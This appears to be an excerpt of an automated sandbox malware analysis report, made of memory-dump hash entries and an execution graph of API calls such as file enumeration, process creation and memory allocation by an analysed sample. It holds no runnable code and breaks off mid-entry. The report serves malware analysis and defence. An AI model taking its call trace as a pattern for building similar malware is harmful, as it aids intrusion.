                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76e418dce2a1951f982fa8c50971899379e8933a93ea2df3fd25af1efcf8ef3a
                                                  • Instruction ID: ebd8ae90a27c8cfa4c97d54865860c340995a3a54779800482a0c8695a64ac0b
                                                  • Opcode Fuzzy Hash: 76e418dce2a1951f982fa8c50971899379e8933a93ea2df3fd25af1efcf8ef3a
                                                  • Instruction Fuzzy Hash: CF90023120190402D1007158885874B004547D0312F99C012B1164515D862989A16971
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df675ec36400ae969d0cbee2680005b3b8085d3191be97e197ad315fa2c0d781
                                                  • Instruction ID: f55dd5027f596ff97cb18f380166ec9c7c39e4409f5e2a966b26f2787681897c
                                                  • Opcode Fuzzy Hash: df675ec36400ae969d0cbee2680005b3b8085d3191be97e197ad315fa2c0d781
                                                  • Instruction Fuzzy Hash: 9F90022124150802D1407158C458747004687D0611F99C012B0024514D861A8AB56AB1
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af447b7794ddde15c47555f304b6b630066d8cfe632dfc7e0f4ee795ebb7a8f2
                                                  • Instruction ID: c5ddca03519d287294d8e51e1ff8f8387e68faf4600d3e1e8742804702e167b3
                                                  • Opcode Fuzzy Hash: af447b7794ddde15c47555f304b6b630066d8cfe632dfc7e0f4ee795ebb7a8f2
                                                  • Instruction Fuzzy Hash: E290023120150802D104715888486C6004547D0311F99C012B6024615E966989E17531
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d2840b84093233c9734563ddda559045dbc02feec48dec14c1b6c1100c41ad4
                                                  • Instruction ID: dc40aa08cd28a25cb304cea40491c4668d07d9d7b794b8a95f270d38c7608c63
                                                  • Opcode Fuzzy Hash: 0d2840b84093233c9734563ddda559045dbc02feec48dec14c1b6c1100c41ad4
                                                  • Instruction Fuzzy Hash: 7C90022160150502D10171588448656004A47D0251FD9C023B1024515ECA298AE2A531
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ede157b14c5427c21266c1c819b14fe456f82b5e41390e3d40a7e98a62a523e3
                                                  • Instruction ID: 067dcd32ce4ae2e682cfbeda678c5fb35199fa50b7ebef00047588ecbf7a7402
                                                  • Opcode Fuzzy Hash: ede157b14c5427c21266c1c819b14fe456f82b5e41390e3d40a7e98a62a523e3
                                                  • Instruction Fuzzy Hash: 199002A1201640924500B258C448B4A454547E0211B99C017F1054520CC52989A19535
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 718d041eff3833117bfb6b9d99349e091a11b2991897426d1d8dfec536ec4589
                                                  • Instruction ID: 075f168d93f6809e3151461d8dccbe3232eebbb0da78adacfc9e56afc267a3a3
                                                  • Opcode Fuzzy Hash: 718d041eff3833117bfb6b9d99349e091a11b2991897426d1d8dfec536ec4589
                                                  • Instruction Fuzzy Hash: 4290023124150402D14171588448646004957D0251FD9C013B0424514E86598BA6AE61
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13ff75d803454f9d72b47f164ac494b217b06e975cfd2bd85cde01ca598fbd70
                                                  • Instruction ID: 238d51ca389baa18b5d90bfb476b647580555ff5bbfc72fe0e138339f3fc9cab
                                                  • Opcode Fuzzy Hash: 13ff75d803454f9d72b47f164ac494b217b06e975cfd2bd85cde01ca598fbd70
                                                  • Instruction Fuzzy Hash: 2C9002216015004241407168C88894640456BE1221799C122B0998510D855D89B55A65
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4cb2b8a55e300543c6ff96bc934d01d22edab8bfd48f83a6dcf810ecc7d5012a
                                                  • Instruction ID: 13adaf5ea556d193dc611e3ed34a057d6ecad8e712cd77f5e199a011f899352d
                                                  • Opcode Fuzzy Hash: 4cb2b8a55e300543c6ff96bc934d01d22edab8bfd48f83a6dcf810ecc7d5012a
                                                  • Instruction Fuzzy Hash: 1F90022124555102D150715C8448656404567E0211F99C022B0814554D855989A56621
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0660762f6ec382f2dbe0cbdac112fca016ec285e097c2cd4bb09f010c06e5be8
                                                  • Instruction ID: c4a5e762667827f8fd1d7d8bdeb9447b3c9f1b6bbcd8b288aba286d8dbf1d8b6
                                                  • Opcode Fuzzy Hash: 0660762f6ec382f2dbe0cbdac112fca016ec285e097c2cd4bb09f010c06e5be8
                                                  • Instruction Fuzzy Hash: 3190023160550802D15071588458786004547D0311F99C012B0024614D87598BA57AA1
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5671053a15b8cdc1670345f80092fb507042144ccb06b17881739418cb3080d
                                                  • Instruction ID: 9d5a9db08944a7eaba1ea4c8405d5ca104d65fe9b8378d835a228926d3e98ba1
                                                  • Opcode Fuzzy Hash: e5671053a15b8cdc1670345f80092fb507042144ccb06b17881739418cb3080d
                                                  • Instruction Fuzzy Hash: D690023120150402D1007598944C686004547E0311F99D012B5024515EC66989E16531
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa22bb9d55ca59255262bb259ad64cf617c30677c8080232eb960ab97ef7d0b4
                                                  • Instruction ID: fb6e2707a2baba55fb0fbf3197f1ad0c867a2bf109f78ce26e7d404461c1ed91
                                                  • Opcode Fuzzy Hash: fa22bb9d55ca59255262bb259ad64cf617c30677c8080232eb960ab97ef7d0b4
                                                  • Instruction Fuzzy Hash: 2A90027120150402D14071588448786004547D0311F99C012B5064514E865D8EE56A65
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88bb82ef97eecaefb54bd32e146e30db4d944f63282fb4d2ac022bcd0bbb2865
                                                  • Instruction ID: f0c786427eab8d56e25e9e813bcec77204b563e6d973569139937ac9e64c7d94
                                                  • Opcode Fuzzy Hash: 88bb82ef97eecaefb54bd32e146e30db4d944f63282fb4d2ac022bcd0bbb2865
                                                  • Instruction Fuzzy Hash: 4190023120190402D1007158884C787004547D0312F99C012B5164515E8669C9E16931
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: a90e2c9c3259625dd7490c76a6cc1e5792550dd3def2739c0c3ac5a1acab6203
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  APIs
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 06AD00AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, Offset: 06ACC000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_6acc000_wab.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable
                                                  • String ID: |d@$|d@
                                                  • API String ID: 3104724169-2026124874
                                                  • Opcode ID: 3f034c1101de0a1d2b1616eb3062e80b07f31a93c078f49006696c62da65b2e1
                                                  • Instruction ID: d0730181e3f8f44ab456f41b5ae635b16afc4ac53b0df64b6e96b766022e49d8
                                                  • Opcode Fuzzy Hash: 3f034c1101de0a1d2b1616eb3062e80b07f31a93c078f49006696c62da65b2e1
                                                  • Instruction Fuzzy Hash: CE31D271A80311DFDBA5BF64EE05B2977B0FB48760F12013AE817BB2E0DB344850DA98

                                                  Execution Graph

                                                  Execution Coverage:3.2%
                                                  Dynamic/Decrypted Code Coverage:3.8%
                                                  Signature Coverage:1.9%
                                                  Total number of Nodes:528
                                                  Total number of Limit Nodes:80
                                                  execution_graph 82211 21ba090 82216 21b9dc0 82211->82216 82213 21ba09d 82228 21b9a60 82213->82228 82215 21ba0b9 82217 21b9de5 82216->82217 82218 21b9f22 82217->82218 82238 21c1e40 82217->82238 82218->82213 82220 21b9f39 82220->82213 82221 21b9f30 82221->82220 82223 21ba021 82221->82223 82249 21b94c0 82221->82249 82225 21ba079 82223->82225 82258 21b9820 82223->82258 82262 21c98d0 82225->82262 82229 21b9a76 82228->82229 82236 21b9a81 82228->82236 82230 21c99b0 RtlAllocateHeap 82229->82230 82230->82236 82231 21b9a97 82231->82215 82232 21b9d8e 82233 21b9da7 82232->82233 82234 21c98d0 RtlFreeHeap 82232->82234 82233->82215 82234->82233 82235 21b94c0 RtlFreeHeap 82235->82236 82236->82231 82236->82232 82236->82235 82237 21b9820 RtlFreeHeap 82236->82237 82237->82236 82239 21c1e4e 82238->82239 82240 21c1e55 82238->82240 82239->82221 82265 21b3e00 82240->82265 82243 21c1e99 82247 21c2031 82243->82247 82269 21c99b0 82243->82269 82246 21c98d0 RtlFreeHeap 82246->82247 82247->82221 82248 21c1eb2 82248->82246 82248->82247 82250 21b94e6 82249->82250 82276 21bcd00 82250->82276 82252 21b954d 82254 21b96d0 82252->82254 82256 21b956b 82252->82256 82253 21b96b5 82253->82221 82254->82253 82255 21b9380 RtlFreeHeap 82254->82255 82255->82254 82256->82253 82281 21b9380 82256->82281 82259 21b9846 82258->82259 82260 21bcd00 RtlFreeHeap 82259->82260 82261 21b98c2 82260->82261 82261->82223 82289 21c7d70 82262->82289 82264 21ba080 82264->82213 82266 21b3e24 82265->82266 82267 21b3e60 LdrLoadDll 82266->82267 82268 21b3e2b 82266->82268 82267->82268 82268->82243 82272 21c1910 LdrLoadDll 82268->82272 82273 21c7d20 82269->82273 82271 21c99cb 82271->82248 82272->82243 82274 21c7d3a 82273->82274 82275 21c7d4b RtlAllocateHeap 82274->82275 82275->82271 82278 21bcd16 82276->82278 82277 21bcd23 82277->82252 82278->82277 82279 21c98d0 RtlFreeHeap 82278->82279 82280 21bcd5c 82279->82280 82280->82252 82282 21b9396 82281->82282 82285 21bcd70 82282->82285 82284 21b949c 82284->82256 82286 21bcd94 82285->82286 82287 21bce2c 82286->82287 82288 21c98d0 RtlFreeHeap 82286->82288 82287->82284 82288->82287 82290 21c7d8d 82289->82290 82291 21c7d9e RtlFreeHeap 82290->82291 82291->82264 82292 21be910 82293 21be974 82292->82293 82323 21b5920 82293->82323 82295 21beaa4 82296 21bea9d 82296->82295 82330 21b5a30 82296->82330 82299 21bec43 82301 21beb3d 82302 21bec52 82301->82302 82339 21be6f0 82301->82339 82303 21c7a20 NtClose 82302->82303 82305 21bec5c 82303->82305 82306 21beb55 82306->82302 82307 21beb60 82306->82307 82308 21c99b0 RtlAllocateHeap 82307->82308 82309 21beb89 82308->82309 82310 21beba8 82309->82310 82311 21beb92 82309->82311 82348 21be5e0 CoInitialize 82310->82348 82312 21c7a20 NtClose 82311->82312 82314 21beb9c 82312->82314 82315 21bebb6 82350 21c74e0 82315->82350 82317 21bec32 82354 21c7a20 82317->82354 82319 21bec3c 82320 21c98d0 RtlFreeHeap 82319->82320 82320->82299 82321 21bebd4 82321->82317 82322 21c74e0 LdrInitializeThunk 82321->82322 82322->82321 82324 21b5953 82323->82324 82325 21b5977 82324->82325 82357 21c7590 82324->82357 82325->82296 82327 21b599a 82327->82325 82328 21c7a20 NtClose 82327->82328 82329 21b5a1a 82328->82329 82329->82296 82331 21b5a55 82330->82331 82362 21c7380 82331->82362 82334 21c5770 82335 21c57cd 82334->82335 82336 21c5800 82335->82336 82367 21bf4c5 RtlFreeHeap 82335->82367 82336->82301 82338 21c57e2 82338->82301 82340 21be70c 82339->82340 82341 21b3e00 LdrLoadDll 82340->82341 82343 21be72a 82341->82343 82342 21be733 82342->82306 82343->82342 82344 21b3e00 LdrLoadDll 82343->82344 82345 21be7fe 82344->82345 82346 21b3e00 LdrLoadDll 82345->82346 82347 21be858 82345->82347 82346->82347 82347->82306 82349 21be645 82348->82349 82349->82315 82351 21c74fd 82350->82351 82368 4352ba0 LdrInitializeThunk 82351->82368 82352 21c752d 82352->82321 82355 21c7a3a 82354->82355 82356 21c7a4b NtClose 82355->82356 82356->82319 82358 21c75ad 82357->82358 82361 4352ca0 LdrInitializeThunk 82358->82361 82359 21c75d9 82359->82327 82361->82359 82363 21c739a 82362->82363 82366 4352c60 LdrInitializeThunk 82363->82366 82364 21b5ac9 82364->82299 82364->82334 82366->82364 82367->82338 82368->82352 82369 21b8fd0 82371 21b8fd7 82369->82371 82370 21b8ff8 82371->82369 82371->82370 82372 21c98d0 RtlFreeHeap 82371->82372 82372->82370 82373 21b63d0 82374 21b63fa 82373->82374 82377 21b7320 82374->82377 82376 21b6424 82378 21b733d 82377->82378 82384 21c7170 82378->82384 82380 21b738d 82381 21b7394 82380->82381 82389 21c7250 82380->82389 82381->82376 82383 21b73bd 82383->82376 82385 21c7203 82384->82385 82387 21c7197 82384->82387 82394 4352f30 LdrInitializeThunk 82385->82394 82386 21c723c 82386->82380 82387->82380 82390 21c72f5 82389->82390 82391 21c7277 82389->82391 82395 4352d10 LdrInitializeThunk 82390->82395 82391->82383 82392 21c733a 82392->82383 82394->82386 82395->82392 82396 21caa10 82397 21c98d0 RtlFreeHeap 82396->82397 82398 21caa25 82397->82398 82399 21c6ed0 82400 21c6f54 82399->82400 82402 21c6ef4 82399->82402 82404 4352ee0 LdrInitializeThunk 82400->82404 82401 21c6f85 82404->82401 82405 21b048b PostThreadMessageW 82406 21b049d 82405->82406 82408 21b7bce 82410 21b7bd3 82408->82410 82409 21b7b92 82410->82409 82412 21b65f0 LdrInitializeThunk LdrInitializeThunk 82410->82412 82412->82409 82414 21aae00 82417 21c9840 82414->82417 82416 21ac471 82420 21c7b70 82417->82420 82419 21c9871 82419->82416 82421 21c7bfa 82420->82421 82423 21c7b94 82420->82423 82422 21c7c10 NtAllocateVirtualMemory 82421->82422 82422->82419 82423->82419 82424 21a92c0 82425 21a92cf 82424->82425 82426 21a9310 82425->82426 82427 21a92fd CreateThread 82425->82427 82428 21b5140 82429 21b5176 82428->82429 82433 21c7080 82428->82433 82437 21c7ab0 82429->82437 82432 21b518b 82434 21c709d 82433->82434 82442 4352c0a 82434->82442 82435 21c70c9 82435->82429 82438 21c7b37 82437->82438 82439 21c7ad7 82437->82439 82445 4352e80 LdrInitializeThunk 82438->82445 82439->82432 82440 21c7b68 82440->82432 82443 4352c11 82442->82443 82444 4352c1f LdrInitializeThunk 82442->82444 82443->82435 82444->82435 82445->82440 82446 21b2047 82447 21b204e 82446->82447 82448 21b3e00 LdrLoadDll 82447->82448 82449 21b20a7 82448->82449 82450 21b5920 2 API calls 82449->82450 82451 21b20d3 82449->82451 82450->82451 82457 21c7980 82458 21c79ec 82457->82458 82460 21c79a4 82457->82460 82459 21c7a02 NtDeleteFile 82458->82459 82461 21c0b43 82464 21c4410 82461->82464 82463 21c0b56 82465 21c446d 82464->82465 82466 21c44a8 82465->82466 82469 21c0480 82465->82469 82466->82463 82468 21c448a 82468->82463 82470 21c049e 82469->82470 82471 21c042d 82469->82471 82472 21c7a20 NtClose 82471->82472 82473 21c0464 82472->82473 82473->82468 82474 4352ad0 LdrInitializeThunk 82475 21b2a73 82476 21b2a2e 82475->82476 82477 21b2a7f 82476->82477 82478 21b2a3c 82476->82478 82482 21b7170 82476->82482 82480 21c7a20 NtClose 82478->82480 82481 21b2a51 82478->82481 82480->82481 82483 21b718a 82482->82483 82487 21b7266 82482->82487 82488 21c7120 82483->82488 82486 21c7a20 NtClose 82486->82487 82487->82478 82489 21c713a 82488->82489 82492 43535c0 LdrInitializeThunk 82489->82492 82490 21b725a 82490->82486 82492->82490 82493 21bb830 82495 21bb859 82493->82495 82494 21bb95d 82495->82494 82496 21bb903 FindFirstFileW 82495->82496 82496->82494 82497 21bb91e 82496->82497 82498 21bb944 FindNextFileW 82497->82498 82498->82497 82499 21bb956 FindClose 82498->82499 82499->82494 82500 21b50b0 82505 21b74f0 82500->82505 82502 21b50e0 82504 21b510c 82502->82504 82509 21b7470 82502->82509 82506 21b7503 82505->82506 82516 21c6f90 82506->82516 82508 21b752e 82508->82502 82510 21b74b4 82509->82510 82511 21b74d5 82510->82511 82522 21c6d90 82510->82522 82511->82502 82513 21b74c5 82514 21b74e1 82513->82514 82515 21c7a20 NtClose 82513->82515 82514->82502 82515->82511 82517 21c7003 82516->82517 82518 21c6fb4 82516->82518 82521 4352dd0 LdrInitializeThunk 82517->82521 82518->82508 82519 21c7028 82519->82508 82521->82519 82523 21c6e02 82522->82523 82525 21c6db4 82522->82525 82527 4354650 LdrInitializeThunk 82523->82527 82524 21c6e27 82524->82513 82525->82513 82527->82524 82528 21b6970 82529 21b69e2 82528->82529 82530 21b6988 82528->82530 82530->82529 82532 21ba590 82530->82532 82533 21ba5b6 82532->82533 82534 21ba7d5 82533->82534 82559 21c7e00 82533->82559 82534->82529 82536 21ba62c 82536->82534 82562 21caae0 82536->82562 82538 21ba648 82538->82534 82539 21ba719 82538->82539 82540 21c7080 LdrInitializeThunk 82538->82540 82541 21b5030 LdrInitializeThunk 82539->82541 82543 21ba738 82539->82543 82542 21ba6a4 82540->82542 82541->82543 82542->82539 82545 21ba6ad 82542->82545 82547 21ba7bd 82543->82547 82571 21c6c50 82543->82571 82544 21ba701 82548 21b74f0 LdrInitializeThunk 82544->82548 82545->82534 82545->82544 82546 21ba6df 82545->82546 82568 21b5030 82545->82568 82586 21c3220 LdrInitializeThunk 82546->82586 82553 21b74f0 LdrInitializeThunk 82547->82553 82552 21ba70f 82548->82552 82552->82529 82555 21ba7cb 82553->82555 82554 21ba794 82576 21c6cf0 82554->82576 82555->82529 82557 21ba7ae 82581 21c6e30 82557->82581 82560 21c7e1a 82559->82560 82561 21c7e2b CreateProcessInternalW 82560->82561 82561->82536 82563 21caa50 82562->82563 82564 21caaad 82563->82564 82565 21c99b0 RtlAllocateHeap 82563->82565 82564->82538 82566 21caa8a 82565->82566 82567 21c98d0 RtlFreeHeap 82566->82567 82567->82564 82569 21c7250 LdrInitializeThunk 82568->82569 82570 21b506e 82569->82570 82570->82546 82572 21c6c74 82571->82572 82573 21c6cc2 82571->82573 82572->82554 82587 43539b0 LdrInitializeThunk 82573->82587 82574 21c6ce7 82574->82554 82577 21c6d65 82576->82577 82579 21c6d17 82576->82579 82588 4354340 LdrInitializeThunk 82577->82588 82578 21c6d8a 82578->82557 82579->82557 82582 21c6ea2 82581->82582 82584 21c6e54 82581->82584 82589 4352fb0 LdrInitializeThunk 82582->82589 82583 21c6ec7 82583->82547 82584->82547 82586->82544 82587->82574 82588->82578 82589->82583 82590 21bf1f0 82591 21bf20d 82590->82591 82592 21b3e00 LdrLoadDll 82591->82592 82593 21bf22b 82592->82593 82594 21c5770 RtlFreeHeap 82593->82594 82595 21bf3aa 82593->82595 82594->82595 82601 21c7030 82602 21c704a 82601->82602 82605 4352df0 LdrInitializeThunk 82602->82605 82603 21c7072 82605->82603 82611 21c7730 82612 21c77dc 82611->82612 82614 21c7758 82611->82614 82613 21c77f2 NtCreateFile 82612->82613 82615 21c0b70 82616 21c0b7f 82615->82616 82617 21c0bc6 82616->82617 82620 21c0c04 82616->82620 82622 21c0c09 82616->82622 82618 21c98d0 RtlFreeHeap 82617->82618 82619 21c0bd6 82618->82619 82621 21c98d0 RtlFreeHeap 82620->82621 82621->82622 82623 21c0371 82635 21c7890 82623->82635 82625 21c0392 82626 21c03c5 82625->82626 82627 21c03b0 82625->82627 82629 21c7a20 NtClose 82626->82629 82628 21c7a20 NtClose 82627->82628 82630 21c03b9 82628->82630 82632 21c03ce 82629->82632 82631 21c03fa 82632->82631 82633 21c98d0 RtlFreeHeap 82632->82633 82634 21c03ee 82633->82634 82636 21c792c 82635->82636 82638 21c78b4 82635->82638 82637 21c7942 NtReadFile 82636->82637 82637->82625 82638->82625 82639 21b7762 GetFileAttributesW 82640 21b7773 82639->82640 82641 21a9320 82644 21a9723 82641->82644 82643 21a9b3d 82644->82643 82645 21c9570 82644->82645 82646 21c9593 82645->82646 82651 21a3cc0 82646->82651 82648 21c959f 82649 21c95cd 82648->82649 82654 21c4020 82648->82654 82649->82643 82658 21b2b30 82651->82658 82653 21a3ccd 82653->82648 82656 21c407a 82654->82656 82655 21c4087 82655->82649 82656->82655 82669 21b0fe0 82656->82669 82659 21b2b42 82658->82659 82661 21b2b60 82659->82661 82662 21c8440 82659->82662 82661->82653 82664 21c8458 82662->82664 82663 21c847c 82663->82661 82664->82663 82665 21c7080 LdrInitializeThunk 82664->82665 82666 21c84d1 82665->82666 82667 21c98d0 RtlFreeHeap 82666->82667 82668 21c84ea 82667->82668 82668->82661 82670 21b101b 82669->82670 82685 21b7280 82670->82685 82672 21b1023 82673 21b12e5 82672->82673 82674 21c99b0 RtlAllocateHeap 82672->82674 82673->82655 82675 21b1039 82674->82675 82676 21c99b0 RtlAllocateHeap 82675->82676 82677 21b104a 82676->82677 82678 21c99b0 RtlAllocateHeap 82677->82678 82680 21b105b 82678->82680 82684 21b10eb 82680->82684 82696 21b6080 82680->82696 82681 21b3e00 LdrLoadDll 82682 21b12a5 82681->82682 82719 21c6740 82682->82719 82684->82681 82686 21b72ac 82685->82686 82687 21b7170 2 API calls 82686->82687 82688 21b72cf 82687->82688 82689 21b72d9 82688->82689 82690 21b72f1 82688->82690 82691 21b72e4 82689->82691 82693 21c7a20 NtClose 82689->82693 82692 21b730d 82690->82692 82694 21c7a20 NtClose 82690->82694 82691->82672 82692->82672 82693->82691 82695 21b7303 82694->82695 82695->82672 82697 21b60a5 82696->82697 82698 21b5920 2 API calls 82697->82698 82700 21b60d9 82697->82700 82698->82700 82699 21b61f6 82699->82684 82700->82699 82723 21b5bb0 82700->82723 82702 21b616f 82703 21b617a 82702->82703 82704 21b5a30 LdrInitializeThunk 82702->82704 82703->82684 82705 21b622d 82704->82705 82706 21b62e2 82705->82706 82707 21c7a20 